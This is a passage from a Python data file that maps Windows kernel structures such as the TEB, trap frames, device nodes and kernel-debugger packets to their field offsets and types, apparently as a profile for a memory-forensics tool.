'SameTebFlags' : [ 0x17ee, ['unsigned short']],
'SafeThunkCall' : [ 0x17ee, ['BitField', dict(start_bit = 0, end_bit = 1, native_type='unsigned short')]],
'InDebugPrint' : [ 0x17ee, ['BitField', dict(start_bit = 1, end_bit = 2, native_type='unsigned short')]],
'HasFiberData' : [ 0x17ee, ['BitField', dict(start_bit = 2, end_bit = 3, native_type='unsigned short')]],
'SkipThreadAttach' : [ 0x17ee, ['BitField', dict(start_bit = 3, end_bit = 4, native_type='unsigned short')]],
'WerInShipAssertCode' : [ 0x17ee, ['BitField', dict(start_bit = 4, end_bit = 5, native_type='unsigned short')]],
'RanProcessInit' : [ 0x17ee, ['BitField', dict(start_bit = 5, end_bit = 6, native_type='unsigned short')]],
'ClonedThread' : [ 0x17ee, ['BitField', dict(start_bit = 6, end_bit = 7, native_type='unsigned short')]],
'SuppressDebugMsg' : [ 0x17ee, ['BitField', dict(start_bit = 7, end_bit = 8, native_type='unsigned short')]],
'DisableUserStackWalk' : [ 0x17ee, ['BitField', dict(start_bit = 8, end_bit = 9, native_type='unsigned short')]],
'RtlExceptionAttached' : [ 0x17ee, ['BitField', dict(start_bit = 9, end_bit = 10, native_type='unsigned short')]],
'InitialThread' : [ 0x17ee, ['BitField', dict(start_bit = 10, end_bit = 11, native_type='unsigned short')]],
'SpareSameTebBits' : [ 0x17ee, ['BitField', dict(start_bit = 11, end_bit = 16, native_type='unsigned short')]],
'TxnScopeEnterCallback' : [ 0x17f0, ['unsigned long long']],
'TxnScopeExitCallback' : [ 0x17f8, ['unsigned long long']],
'TxnScopeContext' : [ 0x1800, ['unsigned long long']],
'LockCount' : [ 0x1808, ['unsigned long']],
'SpareUlong0' : [ 0x180c, ['unsigned long']],
'ResourceRetValue' : [ 0x1810, ['unsigned long long']],
} ],
'_KTIMER_TABLE' : [ 0x1840, {
'TimerExpiry' : [ 0x0, ['array', 16, ['pointer', ['_KTIMER']]]],
'TimerEntries' : [ 0x40, ['array', 256, ['_KTIMER_TABLE_ENTRY']]],
} ],
'_KTIMER_TABLE_ENTRY' : [ 0x18, {
'Lock' : [ 0x0, ['unsigned long']],
'Entry' : [ 0x4, ['_LIST_ENTRY']],
'Time' : [ 0x10, ['_ULARGE_INTEGER']],
} ],
'_KAFFINITY_EX' : [ 0xc, {
'Count' : [ 0x0, ['unsigned short']],
'Size' : [ 0x2, ['unsigned short']],
'Reserved' : [ 0x4, ['unsigned long']],
'Bitmap' : [ 0x8, ['array', 1, ['unsigned long']]],
} ],
'_KAFFINITY_ENUMERATION_CONTEXT' : [ 0xc, {
'Affinity' : [ 0x0, ['pointer', ['_KAFFINITY_EX']]],
'CurrentMask' : [ 0x4, ['unsigned long']],
'CurrentIndex' : [ 0x8, ['unsigned short']],
} ],
'_GROUP_AFFINITY' : [ 0xc, {
'Mask' : [ 0x0, ['unsigned long']],
'Group' : [ 0x4, ['unsigned short']],
'Reserved' : [ 0x6, ['array', 3, ['unsigned short']]],
} ],
'_XSTATE_SAVE' : [ 0x20, {
'Reserved1' : [ 0x0, ['long long']],
'Reserved2' : [ 0x8, ['unsigned long']],
'Prev' : [ 0xc, ['pointer', ['_XSTATE_SAVE']]],
'Reserved3' : [ 0x10, ['pointer', ['_XSAVE_AREA']]],
'Thread' : [ 0x14, ['pointer', ['_KTHREAD']]],
'Reserved4' : [ 0x18, ['pointer', ['void']]],
'Level' : [ 0x1c, ['unsigned char']],
'XStateContext' : [ 0x0, ['_XSTATE_CONTEXT']],
} ],
'_XSAVE_AREA' : [ 0x240, {
'LegacyState' : [ 0x0, ['_XSAVE_FORMAT']],
'Header' : [ 0x200, ['_XSAVE_AREA_HEADER']],
} ],
'_FXSAVE_FORMAT' : [ 0x1e0, {
'ControlWord' : [ 0x0, ['unsigned short']],
'StatusWord' : [ 0x2, ['unsigned short']],
'TagWord' : [ 0x4, ['unsigned short']],
'ErrorOpcode' : [ 0x6, ['unsigned short']],
'ErrorOffset' : [ 0x8, ['unsigned long']],
'ErrorSelector' : [ 0xc, ['unsigned long']],
'DataOffset' : [ 0x10, ['unsigned long']],
'DataSelector' : [ 0x14, ['unsigned long']],
'MXCsr' : [ 0x18, ['unsigned long']],
'MXCsrMask' : [ 0x1c, ['unsigned long']],
'RegisterArea' : [ 0x20, ['array', 128, ['unsigned char']]],
'Reserved3' : [ 0xa0, ['array', 128, ['unsigned char']]],
'Reserved4' : [ 0x120, ['array', 192, ['unsigned char']]],
} ],
'_FNSAVE_FORMAT' : [ 0x6c, {
'ControlWord' : [ 0x0, ['unsigned long']],
'StatusWord' : [ 0x4, ['unsigned long']],
'TagWord' : [ 0x8, ['unsigned long']],
'ErrorOffset' : [ 0xc, ['unsigned long']],
'ErrorSelector' : [ 0x10, ['unsigned long']],
'DataOffset' : [ 0x14, ['unsigned long']],
'DataSelector' : [ 0x18, ['unsigned long']],
'RegisterArea' : [ 0x1c, ['array', 80, ['unsigned char']]],
} ],
'_KSTACK_AREA' : [ 0x210, {
'FnArea' : [ 0x0, ['_FNSAVE_FORMAT']],
'NpxFrame' : [ 0x0, ['_FXSAVE_FORMAT']],
'StackControl' : [ 0x1e0, ['_KERNEL_STACK_CONTROL']],
'Cr0NpxState' : [ 0x1fc, ['unsigned long']],
'Padding' : [ 0x200, ['array', 4, ['unsigned long']]],
} ],
'_KERNEL_STACK_CONTROL' : [ 0x1c, {
'PreviousTrapFrame' : [ 0x0, ['pointer', ['_KTRAP_FRAME']]],
'PreviousExceptionList' : [ 0x0, ['pointer', ['void']]],
'StackControlFlags' : [ 0x4, ['unsigned long']],
'PreviousLargeStack' : [ 0x4, ['BitField', dict(start_bit = 0, end_bit = 1, native_type='unsigned long')]],
'PreviousSegmentsPresent' : [ 0x4, ['BitField', dict(start_bit = 1, end_bit = 2, native_type='unsigned long')]],
'ExpandCalloutStack' : [ 0x4, ['BitField', dict(start_bit = 2, end_bit = 3, native_type='unsigned long')]],
'Previous' : [ 0x8, ['_KERNEL_STACK_SEGMENT']],
} ],
'_KTRAP_FRAME' : [ 0x8c, {
'DbgEbp' : [ 0x0, ['unsigned long']],
'DbgEip' : [ 0x4, ['unsigned long']],
'DbgArgMark' : [ 0x8, ['unsigned long']],
'DbgArgPointer' : [ 0xc, ['unsigned long']],
'TempSegCs' : [ 0x10, ['unsigned short']],
'Logging' : [ 0x12, ['unsigned char']],
'Reserved' : [ 0x13, ['unsigned char']],
'TempEsp' : [ 0x14, ['unsigned long']],
'Dr0' : [ 0x18, ['unsigned long']],
'Dr1' : [ 0x1c, ['unsigned long']],
'Dr2' : [ 0x20, ['unsigned long']],
'Dr3' : [ 0x24, ['unsigned long']],
'Dr6' : [ 0x28, ['unsigned long']],
'Dr7' : [ 0x2c, ['unsigned long']],
'SegGs' : [ 0x30, ['unsigned long']],
'SegEs' : [ 0x34, ['unsigned long']],
'SegDs' : [ 0x38, ['unsigned long']],
'Edx' : [ 0x3c, ['unsigned long']],
'Ecx' : [ 0x40, ['unsigned long']],
'Eax' : [ 0x44, ['unsigned long']],
'PreviousPreviousMode' : [ 0x48, ['unsigned long']],
'ExceptionList' : [ 0x4c, ['pointer', ['_EXCEPTION_REGISTRATION_RECORD']]],
'SegFs' : [ 0x50, ['unsigned long']],
'Edi' : [ 0x54, ['unsigned long']],
'Esi' : [ 0x58, ['unsigned long']],
'Ebx' : [ 0x5c, ['unsigned long']],
'Ebp' : [ 0x60, ['unsigned long']],
'ErrCode' : [ 0x64, ['unsigned long']],
'Eip' : [ 0x68, ['unsigned long']],
'SegCs' : [ 0x6c, ['unsigned long']],
'EFlags' : [ 0x70, ['unsigned long']],
'HardwareEsp' : [ 0x74, ['unsigned long']],
'HardwareSegSs' : [ 0x78, ['unsigned long']],
'V86Es' : [ 0x7c, ['unsigned long']],
'V86Ds' : [ 0x80, ['unsigned long']],
'V86Fs' : [ 0x84, ['unsigned long']],
'V86Gs' : [ 0x88, ['unsigned long']],
} ],
'_PNP_DEVICE_COMPLETION_QUEUE' : [ 0x2c, {
'DispatchedList' : [ 0x0, ['_LIST_ENTRY']],
'DispatchedCount' : [ 0x8, ['unsigned long']],
'CompletedList' : [ 0xc, ['_LIST_ENTRY']],
'CompletedSemaphore' : [ 0x14, ['_KSEMAPHORE']],
'SpinLock' : [ 0x28, ['unsigned long']],
} ],
'_KSEMAPHORE' : [ 0x14, {
'Header' : [ 0x0, ['_DISPATCHER_HEADER']],
'Limit' : [ 0x10, ['long']],
} ],
'_DEVOBJ_EXTENSION' : [ 0x3c, {
'Type' : [ 0x0, ['short']],
'Size' : [ 0x2, ['unsigned short']],
'DeviceObject' : [ 0x4, ['pointer', ['_DEVICE_OBJECT']]],
'PowerFlags' : [ 0x8, ['unsigned long']],
'Dope' : [ 0xc, ['pointer', ['_DEVICE_OBJECT_POWER_EXTENSION']]],
'ExtensionFlags' : [ 0x10, ['unsigned long']],
'DeviceNode' : [ 0x14, ['pointer', ['void']]],
'AttachedTo' : [ 0x18, ['pointer', ['_DEVICE_OBJECT']]],
'StartIoCount' : [ 0x1c, ['long']],
'StartIoKey' : [ 0x20, ['long']],
'StartIoFlags' : [ 0x24, ['unsigned long']],
'Vpb' : [ 0x28, ['pointer', ['_VPB']]],
'DependentList' : [ 0x2c, ['_LIST_ENTRY']],
'ProviderList' : [ 0x34, ['_LIST_ENTRY']],
} ],
'__unnamed_1740' : [ 0x4, {
'LegacyDeviceNode' : [ 0x0, ['pointer', ['_DEVICE_NODE']]],
'PendingDeviceRelations' : [ 0x0, ['pointer', ['_DEVICE_RELATIONS']]],
'Information' : [ 0x0, ['pointer', ['void']]],
} ],
'__unnamed_1742' : [ 0x4, {
'NextResourceDeviceNode' : [ 0x0, ['pointer', ['_DEVICE_NODE']]],
} ],
'__unnamed_1746' : [ 0x10, {
'DockStatus' : [ 0x0, ['Enumeration', dict(target = 'long', choices = {0: 'DOCK_NOTDOCKDEVICE', 1: 'DOCK_QUIESCENT', 2: 'DOCK_ARRIVING', 3: 'DOCK_DEPARTING', 4: 'DOCK_EJECTIRP_COMPLETED'})]],
'ListEntry' : [ 0x4, ['_LIST_ENTRY']],
'SerialNumber' : [ 0xc, ['pointer', ['unsigned short']]],
} ],
'_DEVICE_NODE' : [ 0x188, {
'Sibling' : [ 0x0, ['pointer', ['_DEVICE_NODE']]],
'Child' : [ 0x4, ['pointer', ['_DEVICE_NODE']]],
'Parent' : [ 0x8, ['pointer', ['_DEVICE_NODE']]],
'LastChild' : [ 0xc, ['pointer', ['_DEVICE_NODE']]],
'PhysicalDeviceObject' : [ 0x10, ['pointer', ['_DEVICE_OBJECT']]],
'InstancePath' : [ 0x14, ['_UNICODE_STRING']],
'ServiceName' : [ 0x1c, ['_UNICODE_STRING']],
'PendingIrp' : [ 0x24, ['pointer', ['_IRP']]],
'Level' : [ 0x28, ['unsigned long']],
'Notify' : [ 0x2c, ['_PO_DEVICE_NOTIFY']],
'PoIrpManager' : [ 0x68, ['_PO_IRP_MANAGER']],
'State' : [ 0x78, ['Enumeration', dict(target = 'long', choices = {768: 'DeviceNodeUnspecified', 769: 'DeviceNodeUninitialized', 770: 'DeviceNodeInitialized', 771: 'DeviceNodeDriversAdded', 772: 'DeviceNodeResourcesAssigned', 773: 'DeviceNodeStartPending', 774: 'DeviceNodeStartCompletion', 775: 'DeviceNodeStartPostWork', 776: 'DeviceNodeStarted', 777: 'DeviceNodeQueryStopped', 778: 'DeviceNodeStopped', 779: 'DeviceNodeRestartCompletion', 780: 'DeviceNodeEnumeratePending', 781: 'DeviceNodeEnumerateCompletion', 782: 'DeviceNodeAwaitingQueuedDeletion', 783: 'DeviceNodeAwaitingQueuedRemoval', 784: 'DeviceNodeQueryRemoved', 785: 'DeviceNodeRemovePendingCloses', 786: 'DeviceNodeRemoved', 787: 'DeviceNodeDeletePendingCloses', 788: 'DeviceNodeDeleted', 789: 'MaxDeviceNodeState'})]],
'PreviousState' : [ 0x7c, ['Enumeration', dict(target = 'long', choices = {768: 'DeviceNodeUnspecified', 769: 'DeviceNodeUninitialized', 770: 'DeviceNodeInitialized', 771: 'DeviceNodeDriversAdded', 772: 'DeviceNodeResourcesAssigned', 773: 'DeviceNodeStartPending', 774: 'DeviceNodeStartCompletion', 775: 'DeviceNodeStartPostWork', 776: 'DeviceNodeStarted', 777: 'DeviceNodeQueryStopped', 778: 'DeviceNodeStopped', 779: 'DeviceNodeRestartCompletion', 780: 'DeviceNodeEnumeratePending', 781: 'DeviceNodeEnumerateCompletion', 782: 'DeviceNodeAwaitingQueuedDeletion', 783: 'DeviceNodeAwaitingQueuedRemoval', 784: 'DeviceNodeQueryRemoved', 785: 'DeviceNodeRemovePendingCloses', 786: 'DeviceNodeRemoved', 787: 'DeviceNodeDeletePendingCloses', 788: 'DeviceNodeDeleted', 789: 'MaxDeviceNodeState'})]],
'StateHistory' : [ 0x80, ['array', -80, ['Enumeration', dict(target = 'long', choices = {768: 'DeviceNodeUnspecified', 769: 'DeviceNodeUninitialized', 770: 'DeviceNodeInitialized', 771: 'DeviceNodeDriversAdded', 772: 'DeviceNodeResourcesAssigned', 773: 'DeviceNodeStartPending', 774: 'DeviceNodeStartCompletion', 775: 'DeviceNodeStartPostWork', 776: 'DeviceNodeStarted', 777: 'DeviceNodeQueryStopped', 778: 'DeviceNodeStopped', 779: 'DeviceNodeRestartCompletion', 780: 'DeviceNodeEnumeratePending', 781: 'DeviceNodeEnumerateCompletion', 782: 'DeviceNodeAwaitingQueuedDeletion', 783: 'DeviceNodeAwaitingQueuedRemoval', 784: 'DeviceNodeQueryRemoved', 785: 'DeviceNodeRemovePendingCloses', 786: 'DeviceNodeRemoved', 787: 'DeviceNodeDeletePendingCloses', 788: 'DeviceNodeDeleted', 789: 'MaxDeviceNodeState'})]]],
'StateHistoryEntry' : [ 0xd0, ['unsigned long']],
'CompletionStatus' : [ 0xd4, ['long']],
'Flags' : [ 0xd8, ['unsigned long']],
'UserFlags' : [ 0xdc, ['unsigned long']],
'Problem' : [ 0xe0, ['unsigned long']],
'ResourceList' : [ 0xe4, ['pointer', ['_CM_RESOURCE_LIST']]],
'ResourceListTranslated' : [ 0xe8, ['pointer', ['_CM_RESOURCE_LIST']]],
'DuplicatePDO' : [ 0xec, ['pointer', ['_DEVICE_OBJECT']]],
'ResourceRequirements' : [ 0xf0, ['pointer', ['_IO_RESOURCE_REQUIREMENTS_LIST']]],
'InterfaceType' : [ 0xf4, ['Enumeration', dict(target = 'long', choices = {0: 'Internal', 1: 'Isa', 2: 'Eisa', 3: 'MicroChannel', 4: 'TurboChannel', 5: 'PCIBus', 6: 'VMEBus', 7: 'NuBus', 8: 'PCMCIABus', 9: 'CBus', 10: 'MPIBus', 11: 'MPSABus', 12: 'ProcessorInternal', 13: 'InternalPowerBus', 14: 'PNPISABus', 15: 'PNPBus', 16: 'Vmcs', 17: 'MaximumInterfaceType', -1: 'InterfaceTypeUndefined'})]],
'BusNumber' : [ 0xf8, ['unsigned long']],
'ChildInterfaceType' : [ 0xfc, ['Enumeration', dict(target = 'long', choices = {0: 'Internal', 1: 'Isa', 2: 'Eisa', 3: 'MicroChannel', 4: 'TurboChannel', 5: 'PCIBus', 6: 'VMEBus', 7: 'NuBus', 8: 'PCMCIABus', 9: 'CBus', 10: 'MPIBus', 11: 'MPSABus', 12: 'ProcessorInternal', 13: 'InternalPowerBus', 14: 'PNPISABus', 15: 'PNPBus', 16: 'Vmcs', 17: 'MaximumInterfaceType', -1: 'InterfaceTypeUndefined'})]],
'ChildBusNumber' : [ 0x100, ['unsigned long']],
'ChildBusTypeIndex' : [ 0x104, ['unsigned short']],
'RemovalPolicy' : [ 0x106, ['unsigned char']],
'HardwareRemovalPolicy' : [ 0x107, ['unsigned char']],
'TargetDeviceNotify' : [ 0x108, ['_LIST_ENTRY']],
'DeviceArbiterList' : [ 0x110, ['_LIST_ENTRY']],
'DeviceTranslatorList' : [ 0x118, ['_LIST_ENTRY']],
'NoTranslatorMask' : [ 0x120, ['unsigned short']],
'QueryTranslatorMask' : [ 0x122, ['unsigned short']],
'NoArbiterMask' : [ 0x124, ['unsigned short']],
'QueryArbiterMask' : [ 0x126, ['unsigned short']],
'OverUsed1' : [ 0x128, ['__unnamed_1740']],
'OverUsed2' : [ 0x12c, ['__unnamed_1742']],
'BootResources' : [ 0x130, ['pointer', ['_CM_RESOURCE_LIST']]],
'BootResourcesTranslated' : [ 0x134, ['pointer', ['_CM_RESOURCE_LIST']]],
'CapabilityFlags' : [ 0x138, ['unsigned long']],
'DockInfo' : [ 0x13c, ['__unnamed_1746']],
'DisableableDepends' : [ 0x14c, ['unsigned long']],
'PendedSetInterfaceState' : [ 0x150, ['_LIST_ENTRY']],
'LegacyBusListEntry' : [ 0x158, ['_LIST_ENTRY']],
'DriverUnloadRetryCount' : [ 0x160, ['unsigned long']],
'PreviousParent' : [ 0x164, ['pointer', ['_DEVICE_NODE']]],
'DeletedChildren' : [ 0x168, ['unsigned long']],
'NumaNodeIndex' : [ 0x16c, ['unsigned long']],
'ContainerID' : [ 0x170, ['_GUID']],
'OverrideFlags' : [ 0x180, ['unsigned char']],
'RequiresUnloadedDriver' : [ 0x181, ['unsigned char']],
'PendingEjectRelations' : [ 0x184, ['pointer', ['_PENDING_RELATIONS_LIST_ENTRY']]],
} ],
'_KNODE' : [ 0x80, {
'PagedPoolSListHead' : [ 0x0, ['_SLIST_HEADER']],
'NonPagedPoolSListHead' : [ 0x8, ['array', 3, ['_SLIST_HEADER']]],
'Affinity' : [ 0x20, ['_GROUP_AFFINITY']],
'ProximityId' : [ 0x2c, ['unsigned long']],
'NodeNumber' : [ 0x30, ['unsigned short']],
'PrimaryNodeNumber' : [ 0x32, ['unsigned short']],
'MaximumProcessors' : [ 0x34, ['unsigned char']],
'Color' : [ 0x35, ['unsigned char']],
'Flags' : [ 0x36, ['_flags']],
'NodePad0' : [ 0x37, ['unsigned char']],
'Seed' : [ 0x38, ['unsigned long']],
'MmShiftedColor' : [ 0x3c, ['unsigned long']],
'FreeCount' : [ 0x40, ['array', 2, ['unsigned long']]],
'CachedKernelStacks' : [ 0x48, ['_CACHED_KSTACK_LIST']],
'ParkLock' : [ 0x60, ['long']],
'NodePad1' : [ 0x64, ['unsigned long']],
} ],
'_PNP_ASSIGN_RESOURCES_CONTEXT' : [ 0xc, {
'IncludeFailedDevices' : [ 0x0, ['unsigned long']],
'DeviceCount' : [ 0x4, ['unsigned long']],
'DeviceList' : [ 0x8, ['array', 1, ['pointer', ['_DEVICE_OBJECT']]]],
} ],
'_PNP_RESOURCE_REQUEST' : [ 0x28, {
'PhysicalDevice' : [ 0x0, ['pointer', ['_DEVICE_OBJECT']]],
'Flags' : [ 0x4, ['unsigned long']],
'AllocationType' : [ 0x8, ['Enumeration', dict(target = 'long', choices = {0: 'ArbiterRequestLegacyReported', 1: 'ArbiterRequestHalReported', 2: 'ArbiterRequestLegacyAssigned', 3: 'ArbiterRequestPnpDetected', 4: 'ArbiterRequestPnpEnumerated', -1: 'ArbiterRequestUndefined'})]],
'Priority' : [ 0xc, ['unsigned long']],
'Position' : [ 0x10, ['unsigned long']],
'ResourceRequirements' : [ 0x14, ['pointer', ['_IO_RESOURCE_REQUIREMENTS_LIST']]],
'ReqList' : [ 0x18, ['pointer', ['void']]],
'ResourceAssignment' : [ 0x1c, ['pointer', ['_CM_RESOURCE_LIST']]],
'TranslatedResourceAssignment' : [ 0x20, ['pointer', ['_CM_RESOURCE_LIST']]],
'Status' : [ 0x24, ['long']],
} ],
'_IO_RESOURCE_REQUIREMENTS_LIST' : [ 0x48, {
'ListSize' : [ 0x0, ['unsigned long']],
'InterfaceType' : [ 0x4, ['Enumeration', dict(target = 'long', choices = {0: 'Internal', 1: 'Isa', 2: 'Eisa', 3: 'MicroChannel', 4: 'TurboChannel', 5: 'PCIBus', 6: 'VMEBus', 7: 'NuBus', 8: 'PCMCIABus', 9: 'CBus', 10: 'MPIBus', 11: 'MPSABus', 12: 'ProcessorInternal', 13: 'InternalPowerBus', 14: 'PNPISABus', 15: 'PNPBus', 16: 'Vmcs', 17: 'MaximumInterfaceType', -1: 'InterfaceTypeUndefined'})]],
'BusNumber' : [ 0x8, ['unsigned long']],
'SlotNumber' : [ 0xc, ['unsigned long']],
'Reserved' : [ 0x10, ['array', 3, ['unsigned long']]],
'AlternativeLists' : [ 0x1c, ['unsigned long']],
'List' : [ 0x20, ['array', 1, ['_IO_RESOURCE_LIST']]],
} ],
'_EXCEPTION_RECORD64' : [ 0x98, {
'ExceptionCode' : [ 0x0, ['long']],
'ExceptionFlags' : [ 0x4, ['unsigned long']],
'ExceptionRecord' : [ 0x8, ['unsigned long long']],
'ExceptionAddress' : [ 0x10, ['unsigned long long']],
'NumberParameters' : [ 0x18, ['unsigned long']],
'__unusedAlignment' : [ 0x1c, ['unsigned long']],
'ExceptionInformation' : [ 0x20, ['array', 15, ['unsigned long long']]],
} ],
'_EXCEPTION_RECORD32' : [ 0x50, {
'ExceptionCode' : [ 0x0, ['long']],
'ExceptionFlags' : [ 0x4, ['unsigned long']],
'ExceptionRecord' : [ 0x8, ['unsigned long']],
'ExceptionAddress' : [ 0xc, ['unsigned long']],
'NumberParameters' : [ 0x10, ['unsigned long']],
'ExceptionInformation' : [ 0x14, ['array', 15, ['unsigned long']]],
} ],
'_DBGKM_EXCEPTION64' : [ 0xa0, {
'ExceptionRecord' : [ 0x0, ['_EXCEPTION_RECORD64']],
'FirstChance' : [ 0x98, ['unsigned long']],
} ],
'_DBGKM_EXCEPTION32' : [ 0x54, {
'ExceptionRecord' : [ 0x0, ['_EXCEPTION_RECORD32']],
'FirstChance' : [ 0x50, ['unsigned long']],
} ],
'_DBGKD_LOAD_SYMBOLS64' : [ 0x28, {
'PathNameLength' : [ 0x0, ['unsigned long']],
'BaseOfDll' : [ 0x8, ['unsigned long long']],
'ProcessId' : [ 0x10, ['unsigned long long']],
'CheckSum' : [ 0x18, ['unsigned long']],
'SizeOfImage' : [ 0x1c, ['unsigned long']],
'UnloadSymbols' : [ 0x20, ['unsigned char']],
} ],
'_DBGKD_LOAD_SYMBOLS32' : [ 0x18, {
'PathNameLength' : [ 0x0, ['unsigned long']],
'BaseOfDll' : [ 0x4, ['unsigned long']],
'ProcessId' : [ 0x8, ['unsigned long']],
'CheckSum' : [ 0xc, ['unsigned long']],
'SizeOfImage' : [ 0x10, ['unsigned long']],
'UnloadSymbols' : [ 0x14, ['unsigned char']],
} ],
'_DBGKD_READ_MEMORY64' : [ 0x10, {
'TargetBaseAddress' : [ 0x0, ['unsigned long long']],
'TransferCount' : [ 0x8, ['unsigned long']],
'ActualBytesRead' : [ 0xc, ['unsigned long']],
} ],
'_DBGKD_READ_MEMORY32' : [ 0xc, {
'TargetBaseAddress' : [ 0x0, ['unsigned long']],
'TransferCount' : [ 0x4, ['unsigned long']],
'ActualBytesRead' : [ 0x8, ['unsigned long']],
} ],
'_DBGKD_WRITE_MEMORY64' : [ 0x10, {
'TargetBaseAddress' : [ 0x0, ['unsigned long long']],
'TransferCount' : [ 0x8, ['unsigned long']],
'ActualBytesWritten' : [ 0xc, ['unsigned long']],
} ],
'_DBGKD_WRITE_MEMORY32' : [ 0xc, {
'TargetBaseAddress' : [ 0x0, ['unsigned long']],
'TransferCount' : [ 0x4, ['unsigned long']],
'ActualBytesWritten' : [ 0x8, ['unsigned long']],
} ],
'_DBGKD_WRITE_BREAKPOINT64' : [ 0x10, {
'BreakPointAddress' : [ 0x0, ['unsigned long long']],
'BreakPointHandle' : [ 0x8, ['unsigned long']],
} ],
'_DBGKD_WRITE_BREAKPOINT32' : [ 0x8, {
'BreakPointAddress' : [ 0x0, ['unsigned long']],
'BreakPointHandle' : [ 0x4, ['unsigned long']],
} ],
'_DBGKD_READ_WRITE_IO64' : [ 0x10, {
'IoAddress' : [ 0x0, ['unsigned long long']],
'DataSize' : [ 0x8, ['unsigned long']],
'DataValue' : [ 0xc, ['unsigned long']],
} ],
'_DBGKD_READ_WRITE_IO32' : [ 0xc, {
'DataSize' : [ 0x0, ['unsigned long']],
'IoAddress' : [ 0x4, ['unsigned long']],
'DataValue' : [ 0x8, ['unsigned long']],
} ],
'_DBGKD_READ_WRITE_IO_EXTENDED64' : [ 0x20, {
'DataSize' : [ 0x0, ['unsigned long']],
'InterfaceType' : [ 0x4, ['unsigned long']],
'BusNumber' : [ 0x8, ['unsigned long']],
'AddressSpace' : [ 0xc, ['unsigned long']],
'IoAddress' : [ 0x10, ['unsigned long long']],
'DataValue' : [ 0x18, ['unsigned long']],
} ],
'_DBGKD_READ_WRITE_IO_EXTENDED32' : [ 0x18, {
'DataSize' : [ 0x0, ['unsigned long']],
'InterfaceType' : [ 0x4, ['unsigned long']],
'BusNumber' : [ 0x8, ['unsigned long']],
'AddressSpace' : [ 0xc, ['unsigned long']],
'IoAddress' : [ 0x10, ['unsigned long']],
'DataValue' : [ 0x14, ['unsigned long']],
} ],
'_DBGKD_SET_SPECIAL_CALL32' : [ 0x4, {
'SpecialCall' : [ 0x0, ['unsigned long']],
} ],
'_DBGKD_SET_SPECIAL_CALL64' : [ 0x8, {
'SpecialCall' : [ 0x0, ['unsigned long long']],
} ],
'_DBGKD_SET_INTERNAL_BREAKPOINT32' : [ 0x8, {
'BreakpointAddress' : [ 0x0, ['unsigned long']],
'Flags' : [ 0x4, ['unsigned long']],
} ],
'_DBGKD_SET_INTERNAL_BREAKPOINT64' : [ 0x10, {
'BreakpointAddress' : [ 0x0, ['unsigned long long']],
'Flags' : [ 0x8, ['unsigned long']],
} ],
'_DBGKD_GET_INTERNAL_BREAKPOINT64' : [ 0x20, {
'BreakpointAddress' : [ 0x0, ['unsigned long long']],
'Flags' : [ 0x8, ['unsigned long']],
'Calls' : [ 0xc, ['unsigned long']],
'MaxCallsPerPeriod' : [ 0x10, ['unsigned long']],
'MinInstructions' : [ 0x14, ['unsigned long']],
'MaxInstructions' : [ 0x18, ['unsigned long']],
'TotalInstructions' : [ 0x1c, ['unsigned long']],
} ],
'_DBGKD_GET_INTERNAL_BREAKPOINT32' : [ 0x1c, {
'BreakpointAddress' : [ 0x0, ['unsigned long']],
'Flags' : [ 0x4, ['unsigned long']],
'Calls' : [ 0x8, ['unsigned long']],
'MaxCallsPerPeriod' : [ 0xc, ['unsigned long']],
'MinInstructions' : [ 0x10, ['unsigned long']],
'MaxInstructions' : [ 0x14, ['unsigned long']],
'TotalInstructions' : [ 0x18, ['unsigned long']],
} ],
'__unnamed_17ef' : [ 0x28, {
'ReadMemory' : [ 0x0, ['_DBGKD_READ_MEMORY64']],
'WriteMemory' : [ 0x0, ['_DBGKD_WRITE_MEMORY64']],
'GetContext' : [ 0x0, ['_DBGKD_GET_CONTEXT']],
'SetContext' : [ 0x0, ['_DBGKD_SET_CONTEXT']],
'WriteBreakPoint' : [ 0x0, ['_DBGKD_WRITE_BREAKPOINT64']],
'RestoreBreakPoint' : [ 0x0, ['_DBGKD_RESTORE_BREAKPOINT']],
'Continue' : [ 0x0, ['_DBGKD_CONTINUE']],
'Continue2' : [ 0x0, ['_DBGKD_CONTINUE2']],
'ReadWriteIo' : [ 0x0, ['_DBGKD_READ_WRITE_IO64']],
'ReadWriteIoExtended' : [ 0x0, ['_DBGKD_READ_WRITE_IO_EXTENDED64']],
'QuerySpecialCalls' : [ 0x0, ['_DBGKD_QUERY_SPECIAL_CALLS']],
'SetSpecialCall' : [ 0x0, ['_DBGKD_SET_SPECIAL_CALL64']],
'SetInternalBreakpoint' : [ 0x0, ['_DBGKD_SET_INTERNAL_BREAKPOINT64']],
'GetInternalBreakpoint' : [ 0x0, ['_DBGKD_GET_INTERNAL_BREAKPOINT64']],
'GetVersion64' : [ 0x0, ['_DBGKD_GET_VERSION64']],
'BreakPointEx' : [ 0x0, ['_DBGKD_BREAKPOINTEX']],
'ReadWriteMsr' : [ 0x0, ['_DBGKD_READ_WRITE_MSR']],
'SearchMemory' : [ 0x0, ['_DBGKD_SEARCH_MEMORY']],
'GetSetBusData' : [ 0x0, ['_DBGKD_GET_SET_BUS_DATA']],
'FillMemory' : [ 0x0, ['_DBGKD_FILL_MEMORY']],
'QueryMemory' : [ 0x0, ['_DBGKD_QUERY_MEMORY']],
'SwitchPartition' : [ 0x0, ['_DBGKD_SWITCH_PARTITION']],
} ],
'_DBGKD_MANIPULATE_STATE64' : [ 0x38, {
'ApiNumber' : [ 0x0, ['unsigned long']],
'ProcessorLevel' : [ 0x4, ['unsigned short']],
'Processor' : [ 0x6, ['unsigned short']],
'ReturnStatus' : [ 0x8, ['long']],
'u' : [ 0x10, ['__unnamed_17ef']],
} ],
'__unnamed_17f6' : [ 0x28, {
'ReadMemory' : [ 0x0, ['_DBGKD_READ_MEMORY32']],
'WriteMemory' : [ 0x0, ['_DBGKD_WRITE_MEMORY32']],
'ReadMemory64' : [ 0x0, ['_DBGKD_READ_MEMORY64']],
'WriteMemory64' : [ 0x0, ['_DBGKD_WRITE_MEMORY64']],
'GetContext' : [ 0x0, ['_DBGKD_GET_CONTEXT']],
'SetContext' : [ 0x0, ['_DBGKD_SET_CONTEXT']],
'WriteBreakPoint' : [ 0x0, ['_DBGKD_WRITE_BREAKPOINT32']],
'RestoreBreakPoint' : [ 0x0, ['_DBGKD_RESTORE_BREAKPOINT']],
'Continue' : [ 0x0, ['_DBGKD_CONTINUE']],
'Continue2' : [ 0x0, ['_DBGKD_CONTINUE2']],
'ReadWriteIo' : [ 0x0, ['_DBGKD_READ_WRITE_IO32']],
'ReadWriteIoExtended' : [ 0x0, ['_DBGKD_READ_WRITE_IO_EXTENDED32']],
'QuerySpecialCalls' : [ 0x0, ['_DBGKD_QUERY_SPECIAL_CALLS']],
